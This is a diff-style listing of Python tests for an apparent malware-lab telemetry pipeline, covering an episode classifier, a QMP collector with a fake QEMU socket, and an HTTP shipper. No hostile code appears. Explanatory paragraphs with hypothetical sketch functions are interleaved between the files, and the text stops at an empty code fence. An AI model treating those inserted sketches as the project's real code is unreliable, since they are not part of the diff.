||||
|
||||
|
||||
def test_workload_silent_flag(tmp_path: Path) -> None:
|
||||
"""The elliott-lab fingerprint: dormant probe shows yes=0,
|
||||
meaning the workload never actually fired."""
|
||||
tar = _make_episode(
|
||||
tmp_path,
|
||||
**{"01TEST/events.jsonl": _events([
|
||||
{"event": "workload_setup"},
|
||||
{"event": "workload_started", "phase": "infected_running"},
|
||||
{"event": "workload_killed", "phase": "dormant",
|
||||
"pre_kill_probe": {"yes": "0", "loadavg": "0.18"}},
|
||||
])},
|
||||
)
|
||||
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
|
||||
assert "workload-silent" in q.reasons
|
||||
|
||||
|
||||
def test_flat_cpu_flag(tmp_path: Path) -> None:
|
||||
"""When the proc CPU% spread between phases is < 5pp, the episode
|
||||
has no signal for the trainer to learn from."""
|
||||
tar = _make_episode(
|
||||
tmp_path,
|
||||
**{"01TEST/telemetry-proc.jsonl": _proc_rows(flat=True, n=60)},
|
||||
)
|
||||
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
|
||||
assert "flat-cpu" in q.reasons
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Walk + actions
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def _stage_receiver_tree(tmp_path: Path) -> tuple[Path, Path]:
|
||||
"""Build a fake /var/lib/cis490 layout with two episodes: one
|
||||
healthy, one flagged for no-sample. Returns (episodes_root, index_path)."""
|
||||
episodes = tmp_path / "episodes"
|
||||
(episodes / "lab1").mkdir(parents=True)
|
||||
healthy = _make_episode(episodes / "lab1" / "01OK")
|
||||
healthy.rename(episodes / "lab1" / "01OK.tar.zst")
|
||||
bad = _make_episode(
|
||||
episodes / "lab1" / "01FAKE",
|
||||
**{"01TEST/meta.json": _meta(sample=None)},
|
||||
)
|
||||
bad.rename(episodes / "lab1" / "01FAKE.tar.zst")
|
||||
index = tmp_path / "index.jsonl"
|
||||
rows = [
|
||||
{"host_id": "lab1", "episode_id": "01OK"},
|
||||
{"host_id": "lab1", "episode_id": "01FAKE"},
|
||||
]
|
||||
index.write_text("\n".join(json.dumps(r) for r in rows) + "\n")
|
||||
return episodes, index
|
||||
|
||||
|
||||
def test_dry_run_does_not_modify_anything(tmp_path: Path, capsys) -> None:
|
||||
episodes, index = _stage_receiver_tree(tmp_path)
|
||||
rc = pe.main([
|
||||
"--episodes-root", str(episodes),
|
||||
"--index", str(index),
|
||||
"--reason", "no-sample",
|
||||
])
|
||||
# Returns 1 because flagged episodes exist (matches CLI exit semantics).
|
||||
assert rc == 1
|
||||
# Both tarballs still on disk.
|
||||
assert (episodes / "lab1" / "01OK.tar.zst").exists()
|
||||
assert (episodes / "lab1" / "01FAKE.tar.zst").exists()
|
||||
# Index unchanged.
|
||||
assert len(index.read_text().splitlines()) == 2
|
||||
|
||||
|
||||
def test_archive_moves_flagged_and_rewrites_index(tmp_path: Path) -> None:
|
||||
episodes, index = _stage_receiver_tree(tmp_path)
|
||||
archive = tmp_path / "archive"
|
||||
rc = pe.main([
|
||||
"--episodes-root", str(episodes),
|
||||
"--index", str(index),
|
||||
"--archive-root", str(archive),
|
||||
"--reason", "no-sample",
|
||||
"--archive",
|
||||
])
|
||||
assert rc == 1
|
||||
# 01OK kept.
|
||||
assert (episodes / "lab1" / "01OK.tar.zst").exists()
|
||||
# 01FAKE moved.
|
||||
assert not (episodes / "lab1" / "01FAKE.tar.zst").exists()
|
||||
assert (archive / "lab1" / "01FAKE.tar.zst").exists()
|
||||
# Index dropped the bad row.
|
||||
rows = [json.loads(l) for l in index.read_text().splitlines() if l.strip()]
|
||||
assert len(rows) == 1
|
||||
assert rows[0]["episode_id"] == "01OK"
|
||||
|
||||
|
||||
def test_delete_removes_flagged_and_rewrites_index(tmp_path: Path) -> None:
|
||||
episodes, index = _stage_receiver_tree(tmp_path)
|
||||
rc = pe.main([
|
||||
"--episodes-root", str(episodes),
|
||||
"--index", str(index),
|
||||
"--reason", "no-sample",
|
||||
"--delete",
|
||||
])
|
||||
assert rc == 1
|
||||
assert not (episodes / "lab1" / "01FAKE.tar.zst").exists()
|
||||
rows = [json.loads(l) for l in index.read_text().splitlines() if l.strip()]
|
||||
assert len(rows) == 1
|
||||
|
||||
|
||||
def test_host_filter_scopes_to_one_lab_host(tmp_path: Path) -> None:
|
||||
episodes, index = _stage_receiver_tree(tmp_path)
|
||||
rc = pe.main([
|
||||
"--episodes-root", str(episodes),
|
||||
"--index", str(index),
|
||||
"--reason", "no-sample",
|
||||
"--host", "lab2", # nothing matches
|
||||
])
|
||||
assert rc == 0 # zero flagged → exit 0
|
||||
assert (episodes / "lab1" / "01FAKE.tar.zst").exists()
|
||||
|
||||
|
||||
def test_multiple_reasons_combine(tmp_path: Path) -> None:
|
||||
"""An episode failing >1 signal is flagged once, all reasons listed."""
|
||||
tar = _make_episode(
|
||||
tmp_path,
|
||||
**{"01TEST/meta.json": _meta(sample=None),
|
||||
"01TEST/events.jsonl": _events([{"event": "snapshot_load"}])},
|
||||
)
|
||||
q = pe.classify_episode(tar, host_id="x", episode_id="01TEST")
|
||||
assert "no-sample" in q.reasons
|
||||
assert "no-workload-events" in q.reasons
|
||||
assert q.fake
|
||||
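The flat-cpu test above describes the signal as the per-phase CPU% spread falling under 5 percentage points. A minimal sketch of that check follows, assuming each telemetry row carries a `phase` label and a `cpu_pct` value. Both field names, and the helpers `cpu_spread_pp` and `is_flat_cpu`, are hypothetical; the real classifier may compute the spread differently.

```python
from collections import defaultdict
from statistics import mean


def cpu_spread_pp(rows: list[dict]) -> float:
    """Spread, in percentage points, between the highest and lowest
    per-phase mean CPU%. Field names `phase` and `cpu_pct` are assumed."""
    by_phase: dict[str, list[float]] = defaultdict(list)
    for row in rows:
        by_phase[row["phase"]].append(float(row["cpu_pct"]))
    if len(by_phase) < 2:
        # With fewer than two phases there is nothing to compare.
        return 0.0
    means = [mean(values) for values in by_phase.values()]
    return max(means) - min(means)


def is_flat_cpu(rows: list[dict], threshold_pp: float = 5.0) -> bool:
    """True when the per-phase spread is below the threshold."""
    return cpu_spread_pp(rows) < threshold_pp
```

Comparing per-phase means rather than raw samples keeps a single noisy row from masking an otherwise flat episode; that choice is part of the sketch, not something the tests confirm.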
333
tests/test_qmp.py
Normal file
|
|
@@ -0,0 +1,333 @@
|
|||
"""Tests for the QMP collector against an in-process fake QMP server.
|
||||
|
||||
The fake speaks just enough QMP to exercise:
|
||||
- the greeting + qmp_capabilities handshake
|
||||
- query-status
|
||||
- query-blockstats
|
||||
- query-stats target=vm
|
||||
- error responses
|
||||
- async events interleaved with command responses
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import socket
|
||||
import tempfile
|
||||
import threading
|
||||
import time
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
import pytest
|
||||
|
||||
from collectors import qmp
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Fake QMP server
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class FakeQMPServer(threading.Thread):
    """Single-connection fake. Each line received from the client is
    parsed as JSON; we look up ``execute`` in ``responses`` and emit
    the configured reply. Optionally interleaves an async event before
    the response."""

    def __init__(
        self,
        socket_path: Path,
        *,
        responses: dict[str, Any] | None = None,
        emit_event_before: set[str] | None = None,
    ) -> None:
        super().__init__(daemon=True)
        self.socket_path = socket_path
        self.responses = responses or {}
        self.emit_event_before = emit_event_before or set()
        self.received: list[dict] = []
        # Named _stop_event rather than _stop: CPython's threading.Thread
        # has used _stop as a private method name, and shadowing it with
        # an Event can break join() / is_alive().
        self._stop_event = threading.Event()
        self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self._sock.bind(str(socket_path))
        self._sock.listen(1)
        self._sock.settimeout(5.0)

    def run(self) -> None:
        try:
            conn, _ = self._sock.accept()
        except OSError:
            # Timed out, or shutdown() closed the listening socket.
            return
        conn.settimeout(5.0)
        try:
            # Greeting
            conn.sendall(b'{"QMP": {"version": {"qemu": {"major":9,"minor":0,"micro":0}}, "capabilities": []}}\n')
            buf = b""
            while not self._stop_event.is_set():
                try:
                    chunk = conn.recv(4096)
                except socket.timeout:
                    if self._stop_event.is_set():
                        return
                    continue
                if not chunk:
                    return
                buf += chunk
                while b"\n" in buf:
                    line, _, buf = buf.partition(b"\n")
                    if not line.strip():
                        continue
                    msg = json.loads(line)
                    self.received.append(msg)
                    cmd = msg.get("execute")
                    if cmd == "qmp_capabilities":
                        conn.sendall(b'{"return": {}}\n')
                        continue
                    if cmd in self.emit_event_before:
                        conn.sendall(b'{"event": "STOP", "timestamp": {"seconds": 1, "microseconds": 0}}\n')
                    if cmd in self.responses:
                        resp = self.responses[cmd]
                        conn.sendall((json.dumps(resp) + "\n").encode())
                    else:
                        conn.sendall(b'{"error": {"class": "CommandNotFound", "desc": "unknown"}}\n')
        finally:
            conn.close()

    def shutdown(self) -> None:
        self._stop_event.set()
        try:
            self._sock.close()
        except OSError:
            pass
|
||||
|
||||
|
||||
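@pytest.fixture
def qmp_server(tmp_path: Path):
    """Return the UNIX socket path for a fake QMP server. The fixture does
    not start a server; each test builds its own FakeQMPServer on this path."""
    sock_path = tmp_path / "qmp.sock"
    return sock_path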
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Client tests
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_connect_negotiates_capabilities(qmp_server: Path) -> None:
    server = FakeQMPServer(qmp_server)
    server.start()
    try:
        client = qmp.QMPClient(qmp_server)
        greeting = client.connect()
        assert "version" in greeting
    finally:
        client.close()
        server.shutdown()
    # Server saw at least one qmp_capabilities call during the handshake.
    assert any(m.get("execute") == "qmp_capabilities" for m in server.received)
|
||||
|
||||
|
||||
def test_execute_returns_payload(qmp_server: Path) -> None:
|
||||
server = FakeQMPServer(
|
||||
qmp_server,
|
||||
responses={
|
||||
"query-status": {"return": {"status": "running", "running": True}},
|
||||
},
|
||||
)
|
||||
server.start()
|
||||
try:
|
||||
client = qmp.QMPClient(qmp_server)
|
||||
client.connect()
|
||||
out = client.execute("query-status")
|
||||
assert out == {"status": "running", "running": True}
|
||||
finally:
|
||||
client.close()
|
||||
server.shutdown()
|
||||
|
||||
|
||||
def test_execute_skips_async_events_before_response(qmp_server: Path) -> None:
|
||||
server = FakeQMPServer(
|
||||
qmp_server,
|
||||
responses={
|
||||
"query-status": {"return": {"status": "running", "running": True}},
|
||||
},
|
||||
emit_event_before={"query-status"},
|
||||
)
|
||||
server.start()
|
||||
try:
|
||||
client = qmp.QMPClient(qmp_server)
|
||||
client.connect()
|
||||
out = client.execute("query-status")
|
||||
assert out["running"] is True
|
||||
finally:
|
||||
client.close()
|
||||
server.shutdown()
|
||||
|
||||
|
||||
def test_execute_raises_on_qmp_error(qmp_server: Path) -> None:
|
||||
server = FakeQMPServer(qmp_server) # no responses → server sends error
|
||||
server.start()
|
||||
try:
|
||||
client = qmp.QMPClient(qmp_server)
|
||||
client.connect()
|
||||
with pytest.raises(qmp.QMPError):
|
||||
client.execute("totally-fake-command")
|
||||
finally:
|
||||
client.close()
|
||||
server.shutdown()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Row builder tests
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_collect_once_assembles_full_row(qmp_server: Path) -> None:
|
||||
server = FakeQMPServer(
|
||||
qmp_server,
|
||||
responses={
|
||||
"query-status": {"return": {"status": "running", "running": True}},
|
||||
"query-blockstats": {"return": [{
|
||||
"device": "virtio0",
|
||||
"stats": {
|
||||
"rd_operations": 12, "wr_operations": 4,
|
||||
"rd_bytes": 49152, "wr_bytes": 16384,
|
||||
"flush_operations": 1,
|
||||
},
|
||||
}]},
|
||||
"query-stats": {"return": [{"stats": [
|
||||
{"name": "halt_exits", "value": 17000},
|
||||
{"name": "io_exits", "value": 942},
|
||||
{"name": "string-skipped", "value": "not-an-int"},
|
||||
]}]},
|
||||
},
|
||||
)
|
||||
server.start()
|
||||
try:
|
||||
client = qmp.QMPClient(qmp_server)
|
||||
client.connect()
|
||||
row = qmp.collect_once(client, t_mono_origin_ns=time.monotonic_ns())
|
||||
finally:
|
||||
client.close()
|
||||
server.shutdown()
|
||||
|
||||
assert row["source"] == "host_qmp"
|
||||
assert row["available_in_deployment"] is False
|
||||
assert row["vm_running"] is True
|
||||
assert row["blockstats"]["virtio0"]["rd_bytes"] == 49152
|
||||
assert row["blockstats"]["virtio0"]["flush_ops"] == 1
|
||||
assert row["kvm_stats"]["halt_exits"] == 17000
|
||||
assert "string-skipped" not in row["kvm_stats"]
|
||||
|
||||
|
||||
def test_collect_once_tolerates_missing_query_stats(qmp_server: Path) -> None:
|
||||
server = FakeQMPServer(
|
||||
qmp_server,
|
||||
responses={
|
||||
"query-status": {"return": {"status": "running", "running": True}},
|
||||
"query-blockstats": {"return": []},
|
||||
# query-stats deliberately absent → server returns CommandNotFound
|
||||
},
|
||||
)
|
||||
server.start()
|
||||
try:
|
||||
client = qmp.QMPClient(qmp_server)
|
||||
client.connect()
|
||||
row = qmp.collect_once(client, t_mono_origin_ns=time.monotonic_ns())
|
||||
finally:
|
||||
client.close()
|
||||
server.shutdown()
|
||||
|
||||
# Older qemu without query-stats: row still exists, kvm_stats absent.
|
||||
assert "kvm_stats" not in row
|
||||
assert row["vm_running"] is True
|
||||
assert row["blockstats"] == {}
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# run_loop tests
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_run_loop_writes_rows_and_stops_cleanly(qmp_server: Path, tmp_path: Path) -> None:
|
||||
server = FakeQMPServer(
|
||||
qmp_server,
|
||||
responses={
|
||||
"query-status": {"return": {"status": "running", "running": True}},
|
||||
"query-blockstats": {"return": []},
|
||||
"query-stats": {"error": {"class": "CommandNotFound", "desc": "n/a"}},
|
||||
},
|
||||
)
|
||||
server.start()
|
||||
out_path = tmp_path / "telemetry-qmp.jsonl"
|
||||
stop = threading.Event()
|
||||
|
||||
def stop_after(ms: int) -> None:
|
||||
time.sleep(ms / 1000.0)
|
||||
stop.set()
|
||||
|
||||
threading.Thread(target=stop_after, args=(350,), daemon=True).start()
|
||||
rows = qmp.run_loop(
|
||||
socket_path=qmp_server,
|
||||
output_path=out_path,
|
||||
t_mono_origin_ns=time.monotonic_ns(),
|
||||
interval_ms=100,
|
||||
stop_event=stop,
|
||||
)
|
||||
server.shutdown()
|
||||
|
||||
assert rows >= 2, f"expected >=2 rows, got {rows}"
|
||||
lines = [json.loads(l) for l in out_path.read_text().splitlines()]
|
||||
assert len(lines) == rows
|
||||
for r in lines:
|
||||
assert r["source"] == "host_qmp"
|
||||
assert r["vm_running"] is True
|
||||
|
||||
|
||||
def test_savevm_and_loadvm_via_human_monitor(qmp_server: Path) -> None:
|
||||
server = FakeQMPServer(
|
||||
qmp_server,
|
||||
responses={
|
||||
"human-monitor-command": {"return": ""},
|
||||
},
|
||||
)
|
||||
server.start()
|
||||
try:
|
||||
client = qmp.QMPClient(qmp_server)
|
||||
client.connect()
|
||||
out_save = client.savevm("baseline")
|
||||
out_load = client.loadvm("baseline")
|
||||
assert out_save == ""
|
||||
assert out_load == ""
|
||||
finally:
|
||||
client.close()
|
||||
server.shutdown()
|
||||
# Both calls go out as human-monitor-command with the right cmdline.
|
||||
hmcs = [m for m in server.received if m.get("execute") == "human-monitor-command"]
|
||||
cmds = [m["arguments"]["command-line"] for m in hmcs]
|
||||
assert "savevm baseline" in cmds
|
||||
assert "loadvm baseline" in cmds
|
||||
|
||||
|
||||
def test_loadvm_surface_error(qmp_server: Path) -> None:
|
||||
server = FakeQMPServer(qmp_server) # no responses → error reply
|
||||
server.start()
|
||||
try:
|
||||
client = qmp.QMPClient(qmp_server)
|
||||
client.connect()
|
||||
with pytest.raises(qmp.QMPError):
|
||||
client.loadvm("does-not-exist")
|
||||
finally:
|
||||
client.close()
|
||||
server.shutdown()
|
||||
|
||||
|
||||
def test_run_loop_returns_zero_when_socket_missing(tmp_path: Path) -> None:
|
||||
# No server bound to the socket path.
|
||||
rows = qmp.run_loop(
|
||||
socket_path=tmp_path / "nonexistent.sock",
|
||||
output_path=tmp_path / "telemetry-qmp.jsonl",
|
||||
t_mono_origin_ns=time.monotonic_ns(),
|
||||
interval_ms=100,
|
||||
stop_event=threading.Event(),
|
||||
)
|
||||
assert rows == 0
|
||||
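The client tests above rely on one protocol detail: QMP may deliver asynchronous events between a command and its reply, so a client has to skip them while waiting. A minimal sketch of that read loop follows, assuming newline-delimited JSON as spoken by the fake server. `read_reply`, `execute`, and `SketchQMPError` are illustrative names only and are not the API of `collectors.qmp`.

```python
import json
import socket


class SketchQMPError(Exception):
    """Raised when the peer answers a command with an "error" object."""


def read_reply(reader):
    """Return the payload of the next command reply, skipping async events."""
    while True:
        line = reader.readline()
        if not line:
            raise ConnectionError("QMP peer closed the connection")
        msg = json.loads(line)
        if "event" in msg:
            # Async events (STOP, RESUME, ...) can arrive at any time.
            continue
        if "error" in msg:
            raise SketchQMPError(msg["error"].get("desc", "unknown"))
        # Anything else is assumed to be a {"return": ...} reply.
        return msg["return"]


def execute(sock: socket.socket, reader, command: str, arguments=None):
    """Send one command as a JSON line and wait for its reply."""
    request = {"execute": command}
    if arguments:
        request["arguments"] = arguments
    sock.sendall((json.dumps(request) + "\n").encode())
    return read_reply(reader)
```

Here `reader` would be something like `sock.makefile("rb")`. The greeting and the `qmp_capabilities` handshake are left out of the sketch; a real client has to complete both before issuing other commands.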
327
tests/test_shipper.py
Normal file
|
|
@@ -0,0 +1,327 @@
|
|||
"""End-to-end shipper tests.
|
||||
|
||||
These run a real Uvicorn server bound to 127.0.0.1 on a free port,
|
||||
hosting the actual receiver Starlette app over an EpisodeStore on a
|
||||
temp dir. The shipper then talks to that server with its real
|
||||
`httpx.Client` — same code path as production. This catches things
|
||||
the receiver-side ASGI tests can't (HTTP framing, header handling,
|
||||
sync httpx behaviour, content-length quirks).
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import socket
|
||||
import threading
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
import httpx
|
||||
import pytest
|
||||
import uvicorn
|
||||
|
||||
from receiver.app import make_app
|
||||
from receiver.store import EpisodeStore
|
||||
from shipper.config import ReceiverEndpoint, ShipperConfig
|
||||
from shipper.queue import ShipperQueue
|
||||
from shipper.transport import ShipperTransport
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Live-receiver fixture
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def _free_port() -> int:
|
||||
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
|
||||
s.bind(("127.0.0.1", 0))
|
||||
return s.getsockname()[1]
|
||||
|
||||
|
||||
class _ServerThread(threading.Thread):
|
||||
def __init__(self, app, port: int) -> None:
|
||||
super().__init__(daemon=True)
|
||||
cfg = uvicorn.Config(
|
||||
app,
|
||||
host="127.0.0.1",
|
||||
port=port,
|
||||
log_level="error",
|
||||
lifespan="off",
|
||||
access_log=False,
|
||||
)
|
||||
self.server = uvicorn.Server(cfg)
|
||||
|
||||
def run(self) -> None:
|
||||
self.server.run()
|
||||
|
||||
def stop(self) -> None:
|
||||
self.server.should_exit = True
|
||||
|
||||
|
||||
def _wait_for_port(port: int, timeout_s: float = 5.0) -> None:
|
||||
deadline = time.monotonic() + timeout_s
|
||||
while time.monotonic() < deadline:
|
||||
try:
|
||||
with httpx.Client(timeout=0.5) as c:
|
||||
r = c.get(f"http://127.0.0.1:{port}/v1/health")
|
||||
if r.status_code == 200:
|
||||
return
|
||||
except httpx.HTTPError:
|
||||
pass
|
||||
time.sleep(0.05)
|
||||
raise TimeoutError(f"receiver on 127.0.0.1:{port} did not come up")
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def store(tmp_path: Path) -> EpisodeStore:
|
||||
return EpisodeStore(
|
||||
store_root=tmp_path / "rcv-episodes",
|
||||
incoming_root=tmp_path / "rcv-incoming",
|
||||
index_path=tmp_path / "rcv-index.jsonl",
|
||||
)
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def receiver(store: EpisodeStore):
|
||||
app = make_app(store=store, max_episode_bytes=10_000_000, bearer_token=None)
|
||||
port = _free_port()
|
||||
server = _ServerThread(app, port)
|
||||
server.start()
|
||||
try:
|
||||
_wait_for_port(port)
|
||||
yield f"http://127.0.0.1:{port}", store
|
||||
finally:
|
||||
server.stop()
|
||||
server.join(timeout=2)
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def receiver_with_bearer(store: EpisodeStore):
|
||||
app = make_app(store=store, max_episode_bytes=10_000_000, bearer_token="s3cret")
|
||||
port = _free_port()
|
||||
server = _ServerThread(app, port)
|
||||
server.start()
|
||||
try:
|
||||
_wait_for_port(port)
|
||||
yield f"http://127.0.0.1:{port}", store
|
||||
finally:
|
||||
server.stop()
|
||||
server.join(timeout=2)
|
||||
|
||||
|
||||
def _make_shipper(
|
||||
tmp_path: Path,
|
||||
receiver_url: str,
|
||||
*,
|
||||
host_id: str = "lab1",
|
||||
bearer: str | None = None,
|
||||
) -> tuple[ShipperConfig, ShipperTransport, ShipperQueue]:
|
||||
data_root = tmp_path / "lab-data"
|
||||
cfg = ShipperConfig(
|
||||
host_id=host_id,
|
||||
data_root=data_root,
|
||||
receiver=ReceiverEndpoint(url=receiver_url, bearer_token=bearer),
|
||||
scan_interval_s=0.05,
|
||||
)
|
||||
transport = ShipperTransport(cfg)
|
||||
queue = ShipperQueue(cfg, transport)
|
||||
return cfg, transport, queue
|
||||
|
||||
|
||||
def _make_episode(cfg: ShipperConfig, episode_id: str, *, content: bytes = b"data") -> Path:
|
||||
ep = cfg.episodes_dir / episode_id
|
||||
ep.mkdir(parents=True, exist_ok=True)
|
||||
(ep / "meta.json").write_bytes(content)
|
||||
(ep / "events.jsonl").write_text("{}\n")
|
||||
(ep / "labels.jsonl").write_text("{}\n")
|
||||
(ep / "telemetry-proc.jsonl").write_text("{}\n")
|
||||
(ep / "done.marker").touch()
|
||||
return ep
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Ping
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_ping_returns_ok_against_running_receiver(tmp_path: Path, receiver) -> None:
|
||||
url, _ = receiver
|
||||
_, transport, _ = _make_shipper(tmp_path, url)
|
||||
res = transport.ping()
|
||||
assert res.ok is True
|
||||
assert res.status_code == 200
|
||||
assert res.body is not None
|
||||
assert res.body["ok"] is True
|
||||
assert res.body["host_id"] == "lab1"
|
||||
assert res.body["schema_version"] == 1
|
||||
|
||||
|
||||
def test_ping_writes_nothing_to_index(tmp_path: Path, receiver) -> None:
|
||||
url, store = receiver
|
||||
_, transport, _ = _make_shipper(tmp_path, url)
|
||||
transport.ping()
|
||||
transport.ping()
|
||||
transport.ping()
|
||||
assert store.index_path.read_text() == ""
|
||||
|
||||
|
||||
def test_ping_fails_with_wrong_bearer(tmp_path: Path, receiver_with_bearer) -> None:
|
||||
url, _ = receiver_with_bearer
|
||||
_, transport, _ = _make_shipper(tmp_path, url, bearer="WRONG")
|
||||
res = transport.ping()
|
||||
assert res.ok is False
|
||||
assert res.status_code == 401
|
||||
|
||||
|
||||
def test_ping_succeeds_with_right_bearer(tmp_path: Path, receiver_with_bearer) -> None:
|
||||
url, _ = receiver_with_bearer
|
||||
_, transport, _ = _make_shipper(tmp_path, url, bearer="s3cret")
|
||||
res = transport.ping()
|
||||
assert res.ok is True
|
||||
assert res.status_code == 200
|
||||
|
||||
|
||||
def test_ping_fails_when_receiver_unreachable(tmp_path: Path) -> None:
|
||||
# Pick a free port and don't bind it — connect must fail.
|
||||
port = _free_port()
|
||||
_, transport, _ = _make_shipper(tmp_path, f"http://127.0.0.1:{port}")
|
||||
res = transport.ping()
|
||||
assert res.ok is False
|
||||
assert res.status_code == 0
|
||||
assert res.error is not None
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Tar + ship
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_run_once_ships_one_done_episode(tmp_path: Path, receiver) -> None:
|
||||
url, store = receiver
|
||||
cfg, _, queue = _make_shipper(tmp_path, url)
|
||||
_make_episode(cfg, "01EPISODE")
|
||||
|
||||
result = queue.run_once()
|
||||
assert result.scanned == 1
|
||||
assert result.shipped == 1
|
||||
assert result.transient_failures == 0
|
||||
|
||||
# Episode dir moved to shipped/.
|
||||
assert not (cfg.episodes_dir / "01EPISODE").exists()
|
||||
assert (cfg.shipped_dir / "01EPISODE").exists()
|
||||
|
||||
# Outbox tarball cleaned up.
|
||||
assert list(cfg.outbox_dir.iterdir()) == []
|
||||
|
||||
# Receiver stored it and indexed it.
|
||||
assert store.final_path("lab1", "01EPISODE").exists()
|
||||
rows = [json.loads(l) for l in store.index_path.read_text().splitlines()]
|
||||
assert len(rows) == 1
|
||||
assert rows[0]["host_id"] == "lab1"
|
||||
assert rows[0]["episode_id"] == "01EPISODE"
|
||||
|
||||
|
||||
def test_run_once_skips_episodes_without_done_marker(tmp_path: Path, receiver) -> None:
|
||||
url, store = receiver
|
||||
cfg, _, queue = _make_shipper(tmp_path, url)
|
||||
ep = cfg.episodes_dir / "01PARTIAL"
|
||||
ep.mkdir(parents=True)
|
||||
(ep / "meta.json").write_text("{}")
|
||||
# Note: NO done.marker.
|
||||
|
||||
result = queue.run_once()
|
||||
assert result.scanned == 0
|
||||
assert result.shipped == 0
|
||||
assert ep.exists() # untouched
|
||||
assert store.index_path.read_text() == ""
|
||||
|
||||
|
||||
def test_run_once_idempotent_re_ship_returns_already_present(tmp_path: Path, receiver) -> None:
|
||||
"""If a prior run shipped an episode but crashed before retiring it,
|
||||
the next run must re-ship the same bytes successfully (200) and
|
||||
retire the dir, not flag it as a conflict."""
|
||||
url, store = receiver
|
||||
cfg, _, queue = _make_shipper(tmp_path, url)
|
||||
_make_episode(cfg, "01REPLAY", content=b"same-bytes")
|
||||
|
||||
queue.run_once()
|
||||
assert (cfg.shipped_dir / "01REPLAY").exists()
|
||||
|
||||
# Simulate a crash: move it back as if retire never happened.
|
||||
(cfg.shipped_dir / "01REPLAY").rename(cfg.episodes_dir / "01REPLAY")
|
||||
|
||||
result = queue.run_once()
|
||||
assert result.scanned == 1
|
||||
assert result.shipped == 1
|
||||
assert (cfg.shipped_dir / "01REPLAY").exists()
|
||||
|
||||
# Index didn't double up.
|
||||
rows = store.index_path.read_text().splitlines()
|
||||
assert len(rows) == 1
|
||||
|
||||
|
||||
def test_run_once_handles_409_conflict(tmp_path: Path, receiver) -> None:
|
||||
"""If the same episode_id was previously shipped with *different*
|
||||
bytes, the receiver returns 409 and the shipper must NOT retire
|
||||
the local dir — operator triage required."""
|
||||
url, _ = receiver
|
||||
cfg, _, queue = _make_shipper(tmp_path, url)
|
||||
_make_episode(cfg, "01CONFLICT", content=b"first")
|
||||
|
||||
result = queue.run_once()
|
||||
assert result.shipped == 1
|
||||
|
||||
# Simulate a re-do with different content but the same id (e.g., a
|
||||
# botched re-run on the lab host).
|
||||
(cfg.shipped_dir / "01CONFLICT").rename(cfg.episodes_dir / "01CONFLICT")
|
||||
(cfg.episodes_dir / "01CONFLICT" / "meta.json").write_bytes(b"tampered")
|
||||
|
||||
result = queue.run_once()
|
||||
assert result.scanned == 1
|
||||
assert result.shipped == 0
|
||||
assert result.conflicts == 1
|
||||
# Local dir survives — operator can decide what to do.
|
||||
assert (cfg.episodes_dir / "01CONFLICT").exists()
|
||||
|
||||
|
||||
def test_run_once_handles_transient_when_receiver_is_down(tmp_path: Path) -> None:
|
||||
port = _free_port()
|
||||
cfg, _, queue = _make_shipper(tmp_path, f"http://127.0.0.1:{port}")
|
||||
_make_episode(cfg, "01DOWN")
|
||||
|
||||
result = queue.run_once()
|
||||
assert result.scanned == 1
|
||||
assert result.shipped == 0
|
||||
assert result.transient_failures == 1
|
||||
# Episode dir + tarball both stay in place for the next pass.
|
||||
assert (cfg.episodes_dir / "01DOWN").exists()
|
||||
assert (cfg.outbox_dir / "01DOWN.tar.zst").exists()
|
||||
|
||||
|
||||
def test_tarball_round_trips_episode_dir(tmp_path: Path, receiver) -> None:
|
||||
"""The receiver-side tarball must extract back to the original
|
||||
episode dir layout (modulo file order). Verifies the tar+zstd
|
||||
pipe is intact."""
|
||||
import subprocess
|
||||
import tarfile
|
||||
|
||||
url, _ = receiver
|
||||
cfg, _, queue = _make_shipper(tmp_path, url)
|
||||
ep = _make_episode(cfg, "01ROUND", content=b"meta-bytes")
|
||||
expected_files = sorted(p.name for p in ep.iterdir())
|
||||
|
||||
queue.run_once()
|
||||
|
||||
# The receiver stored it; pull the bytes back, decompress + untar.
|
||||
rcv_path = next((tmp_path / "rcv-episodes" / "lab1").glob("01ROUND.tar.zst"))
|
||||
decompressed = tmp_path / "01ROUND.tar"
|
||||
subprocess.check_call(
|
||||
["zstd", "-q", "-d", "-o", str(decompressed), str(rcv_path)],
|
||||
)
|
||||
extract_dir = tmp_path / "extracted"
|
||||
extract_dir.mkdir()
|
||||
with tarfile.open(decompressed) as tf:
|
||||
tf.extractall(extract_dir)
|
||||
|
||||
got_files = sorted(p.name for p in (extract_dir / "01ROUND").iterdir())
|
||||
assert got_files == expected_files
|
||||
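The shipper tests above pin down three outcomes for an upload attempt: a success (including an idempotent re-ship) retires the local directory, a 409 keeps it for operator triage, and an unreachable receiver leaves everything in place for the next pass. A sketch of that decision as a pure function follows. `Outcome` and `classify_upload` are hypothetical names, and treating every other status as transient is an assumption, not the shipper's documented behaviour.

```python
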